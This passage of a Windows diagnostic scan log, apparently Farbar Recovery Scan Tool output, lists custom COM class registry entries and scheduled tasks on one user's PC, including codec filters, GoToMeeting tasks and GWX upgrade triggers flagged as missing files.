CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{4E77131D-3629-431C-9818-C5679DC83E81}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{505C2E67-8615-4CA9-9B57-48CF6EE696FD}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{50EF4544-AC9F-4A8E-B21B-8A26180DB13F}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{53BD6B4E-3780-4693-AFC3-7161C2F3EE9C}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{564FD788-86C9-4444-971E-CC4A243DA150}\InprocServer32 -> C:\Program Files\Free Codec Pack\Haali\Splitter.ax ()
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{5908297F-1B90-4C81-8B9D-CAFB1808C432}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{5DBB6D88-2B93-4F9E-BA90-2445304D67E9}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{62BE5D10-60EB-11D0-BD3B-00A0C911CE86}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{632B606A-BBC6-11D2-A329-006097C4E476}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{637E3E39-462F-477E-9DAF-F07B9B1C00D2}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{640167B4-59B0-47A6-B335-A6B3C0695AEA}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{6746C347-576B-4F73-9012-CDFEEA251BC4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{6A08CF80-0E18-11CF-A24D-0020AFD79767}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{6A2E0670-28E4-11D0-A18C-00A0C9118956}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{6BC1CFFA-8FC1-4261-AC22-CFB4CC38DB50}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{6E682784-1ECA-4CF2-988D-96B6E89E9A4D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{70F598E9-F4AB-495A-99E2-A7C4D3D89ABF}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{71F96385-DDD6-48D3-A0C1-AE06E8B055FB}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{720D4AC0-7533-11D0-A5D6-28DB04C10000}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{725F645B-EAED-4FC5-B1C5-D9AD0ACCBA5E}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{76BE8257-C4C0-4D37-90C0-A23372254D27}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{7D8AA343-6E63-4663-BE90-6B80F66540A3}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{7E320092-596A-41B2-BBEB-175D10504EB6}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{7EFC002A-071F-4CE7-B265-F4B4263D2FD2}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{807C1E6C-1D00-453F-B920-B61BB7CDD997}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{807E5A10-4856-4F9A-8E3C-A1F7E75648B3}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{82C588E7-E54B-408C-9F8C-6AF9ADF6F1E9}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\admin\AppData\Local\Citrix\GoToMeeting\3911\G2MOutlookAddin.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{896664F7-12E1-490F-8782-C0835AFD98FC}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{89798CA1-701C-4633-B553-AC73E3424520}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{8D52AA2E-40BE-46D7-8F36-DB7B0F636824}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{8E849609-C7E8-4EC7-8BD3-D55E871A340D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{9113A02D-00A3-46B9-BC5F-9C04DADDD5D7}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{91A52FB4-15AF-43A7-90C9-3A72DF68A01A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{91A52FB8-15AF-43A7-90C9-3A72DF68A01A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{934D4698-6A59-48F8-9F29-9FB30670320E}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{94E15FA1-68AF-4281-A67C-7D5A086169F2}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{9852A670-F845-491B-9BE6-EBD841B8A613}\InprocServer32 -> C:\Program Files\Free Codec Pack\vsfilter.dll (xy-VSFilter Team)
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{99D54F63-1A69-41AE-AA4D-C976EB3F0713}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{9CFC2DF3-6BA3-46EF-A836-E519E81F0EC4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{9DBD2C50-62AD-11D0-B806-00C04FD706EC}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{A5AC04E7-3E13-48CE-A43F-9FBA59DB1544}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{A9B377B6-7D6F-4F37-B208-2AF6DC85E608}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{AB37E6C0-194D-4C33-A924-5178414DEB98}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{AB406AAC-2B2B-11D3-B36B-00C04F6108FF}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{AB9D6472-752F-43F6-B29E-61207BDA8E06}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{AF02484C-A0A9-4669-9051-058AB12B9195}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{AFB6C280-2C41-11D3-8A60-0000F81E0E4A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{B056521A-9B10-425E-B616-1FCD828DB3B1}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{B155BDF8-02F0-451E-9A26-AE317CFD7779}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{B2952B16-0E07-4E5A-B993-58C52CB94CAE}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{B8967F85-58AE-4F46-9FB2-5D7904798F4B}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{BF87B6E1-8C27-11D0-B3F0-00AA003761C5}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{C1AB3D89-6973-45A6-AA44-09CEBBF872E5}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{C3043B13-E649-436A-9CE7-8DA8CB0BF7C8}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{C6E13344-30AC-11D0-A18C-00A0C9118956}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{C6E13360-30AC-11D0-A18C-00A0C9118956}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{C6E13370-30AC-11D0-A18C-00A0C9118956}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{CDA42200-BD88-11D0-BD4E-00A0C911CE86}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{CF49D4E0-1115-11CE-B03A-0020AF0BA770}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{CFC399AF-D876-11D0-9C10-00C04FC99C8E}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D23B90D0-144F-46BD-841D-59E4EB19DC59}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D51BD5A1-7548-11CF-A520-0080C77EF58A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D51BD5A2-7548-11CF-A520-0080C77EF58A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D51BD5A3-7548-11CF-A520-0080C77EF58A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D58960BA-2EF3-4910-9E34-C911B1710180}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D5DC4B7F-786B-42B7-B83B-FE1B5FC15E2C}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D9B3211D-E57F-4426-AAEF-30A806ADD397}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{DB6EFB73-5153-43B7-8078-C6FFC4C0238C}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{DD0822FF-3A09-4BDC-B749-4B00B9115850}\InprocServer32 -> {592F0641-9468-D082-1796-5EA885889A47} => No File
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{DF0AD8E0-F91C-4109-AE46-1EAA5CD8AB08}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{DF0AD8E1-F91C-4109-AE46-1EAA5CD8AB08}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{DF0AD8E3-F91C-4109-AE46-1EAA5CD8AB08}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E1F1A0B8-BEEE-490D-BA7C-066C40B5E2B9}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E297AB5E-40B0-41BD-9E06-E4144084EE5F}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E2FB4720-F45F-4A3C-8CB2-2060E12425C3}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E30629D2-27E5-11CE-875D-00608CB78066}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E3DC6D1E-50E6-469D-818E-CD3FE8E24CF6}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E436EBB1-524F-11CE-9F53-0020AF0BA770}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E436EBB2-524F-11CE-9F53-0020AF0BA770}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E436EBB3-524F-11CE-9F53-0020AF0BA770}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E436EBB5-524F-11CE-9F53-0020AF0BA770}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E8E73B6B-4CB3-44A4-BE99-4F7BCB96E491}\InprocServer32 -> C:\Program Files\Free Codec Pack\LAVFilters\LAVAudio.ax (1f0.de - Hendrik Leppkes)
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{ED233797-F47D-475E-9FCA-3D549E4DDAA4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{EDB5F444-CB8D-445A-A523-EC5AB6EA33C7}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{EE30215D-164F-4A92-A4EB-9D4C13390F9F}\InprocServer32 -> C:\Program Files\Free Codec Pack\LAVFilters\LAVVideo.ax (1f0.de - Hendrik Leppkes)
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{F7FFE0A0-A4F5-44B5-949E-15ED2BC66F9D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{FCC970B8-86D5-4A30-AC33-B76679BDF970}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{FE841493-835C-4FA3-B6CC-B4B2D4719848}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{FF8F1D65-AD2B-47F1-9E71-66B7D35E3852}\InprocServer32 -> no filepath
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {007272BD-FBD2-4EE6-8816-F9FF19C3C66F} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {00AD8FFA-090C-4C17-983F-0543CDFDE3E0} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {07E10364-C6C3-432B-A044-DD86F35313B8} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {0937308A-C4AA-4619-865B-CB23424F4F08} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {0DB458F9-676B-47C6-8786-E010BD319DF3} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {16A563D0-793E-42E5-9E13-95EF017EE5D6} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {16D53BD7-FA47-4432-AFE3-705502A8E523} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {1C16BE4A-9F0E-4673-AF94-5E05D8482ACB} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {22071726-703B-44F5-A914-7FEF7BE0227D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {295A8EE4-036E-40A8-9B6A-120F08E78C53} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\admin\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe [2016-08-26] (Microsoft Corporation)
Task: {2ED2DEEE-53F3-4478-B993-FC25D586C6E8} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {2F5E383C-36A7-4F6C-8F80-3217FCB7A13C} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {303D4316-0D54-407E-A104-78A155B81B51} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {30962FD8-6662-4450-9D4D-8B3A4CCBDC46} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {34AA23E2-3D11-4A1E-B17E-2732AC82E4F7} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {3B674D10-DC75-4E1F-BE5C-691DF1DB63C5} - System32\Tasks\update-S-1-5-21-4142771536-1505296934-324239511-1000 => C:\Program Files\Skillbrains\Updater\Updater.exe [2016-07-11] ()
Task: {408A0412-F65A-4F09-9322-31D9429728B3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)
Task: {457A692C-BB87-47E9-B74F-F102E636E93F} - System32\Tasks\TrackerAutoUpdate => C:\Program Files\Tracker Software\Update\TrackerUpdate.exe [2016-04-19] (Tracker Software Products (Canada) Ltd.)
Task: {48FB8112-B453-4A13-9C75-500D58CFEB8D} - System32\Tasks\G2MUploadTask-S-1-5-21-4142771536-1505296934-324239511-1000 => C:\Users\admin\AppData\Local\Citrix\GoToMeeting\5573\g2mupload.exe [2016-09-19] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {4E1F736B-902D-463C-933F-92624A138B95} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {4EEECABD-9D53-4B5E-A188-3677CBAF92BB} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {4F8F84DF-2BB4-461C-A7C6-4652979A2F95} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {50B25D4C-C7A1-403F-9208-07AF636F2A1E} - System32\Tasks\{5EEB3375-C3D1-4791-877E-8148CF845808} => pcalua.exe -a C:\Users\admin\Downloads\chromeinstall-8u31.exe -d C:\Users\admin\Downloads
Task: {5296E596-FE5B-484E-AB3F-3EE9FD6623ED} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {5B67BF7B-B1A6-407A-B313-3678BEA482DD} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {5C3F8D2D-789F-4CB9-80A0-25CD3E03400E} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {5CE77FED-5846-46C4-BA00-C62A39DD3AA6} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {5E7201A3-8E9C-4C2D-BEEC-46B52A8EE9F9} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe
Task: {66DDDA69-624A-40E3-BFE7-4055EB83ED25} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {67836EA4-408C-4A6A-828E-ECC33C37EDA6} - System32\Tasks\Seagate_Install_Launch => C:\Program Files\Seagate\Seagate Dashboard 2.0\Dashboard.exe
Task: {7702B901-F9A4-429E-93D5-549E30023EF4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {7FAA2931-FD06-4FA6-A24B-76AB8F0C9837} - System32\Tasks\update-sys => C:\Program Files\Skillbrains\Updater\Updater.exe [2016-07-11] ()
Task: {7FAF7534-0270-408D-A569-0ECC5CD0A25B} - System32\Tasks\{B3F1563D-4865-44B3-957F-E221C7333D67} => pcalua.exe -a "C:\Program Files\Xilisoft\PowerPoint to Video Converter Free\Uninstall.exe"
Task: {856014DF-B930-4675-B7C7-FF9A4E10C59C} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {8C97BCBD-BBBC-4ED3-A9FD-F786CA9E2C36} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe
Task: {8F6777BD-9F41-4C0A-99DE-86DE4FBC0CA7} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {996AABA2-C818-4A4D-A78C-300EA56C45EE} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {A18B153C-9196-48C3-AE67-F450E199DAF2} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A45DFC3C-08F1-47A5-9B3C-C9C3F3756A4E} - System32\Tasks\GoogleUpdateTaskMachineUA1d041dfa521745e => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {A4942907-6FB0-454E-BDAF-C4D4193AE14E} - System32\Tasks\G2MUpdateTask-S-1-5-21-4142771536-1505296934-324239511-1000 => C:\Users\admin\AppData\Local\Citrix\GoToMeeting\5573\g2mupdate.exe [2016-09-19] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {AAF5E824-D870-4CE6-8196-5970E2299936} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> No File <==== ATTENTION
Task: {B6E78073-EAE3-4E68-9592-B70AB1858022} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe
Task: {D67B8012-6F59-4823-B626-3931B2E8F8C9} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {D711982C-5900-4525-9BC7-3AEC337E12F7} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {DD4D595D-ADA8-4CE9-9794-97F95C5FBFED} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {E1835671-1132-4B97-B379-6FB17B41F33A} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {E5595236-4AD0-4879-AD75-6F8605F0211E} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {E76746BB-3924-4435-971A-2B0C65D3946B} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {E8C13231-8D0C-4DE8-B0DF-8BC0D2F77729} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-20] (Adobe Systems Incorporated)
Task: {F3A18C0B-ED9A-48D6-9517-4A2B601BFAD4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {F8B01D94-F894-40F3-AD3C-51FE0509E910} - System32\Tasks\GoogleUpdateTaskMachineUA1d08f0476acbae7 => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {FC0893D8-4C4B-4F8B-82B2-D1FD283452A7} - System32\Tasks\{6500079D-710C-4201-A20E-1724F3D7A343} => pcalua.exe -a "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5ZAZU6CA\JavaSetup8u31.com" -d C:\Users\admin\Desktop
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-4142771536-1505296934-324239511-1000.job => C:\Users\admin\AppData\Local\Citrix\GoToMeeting\5636\g2mupdate.exe
Task: C:\WINDOWS\Tasks\G2MUploadTask-S-1-5-21-4142771536-1505296934-324239511-1000.job => C:\Users\admin\AppData\Local\Citrix\GoToMeeting\5636\g2mupload.exe
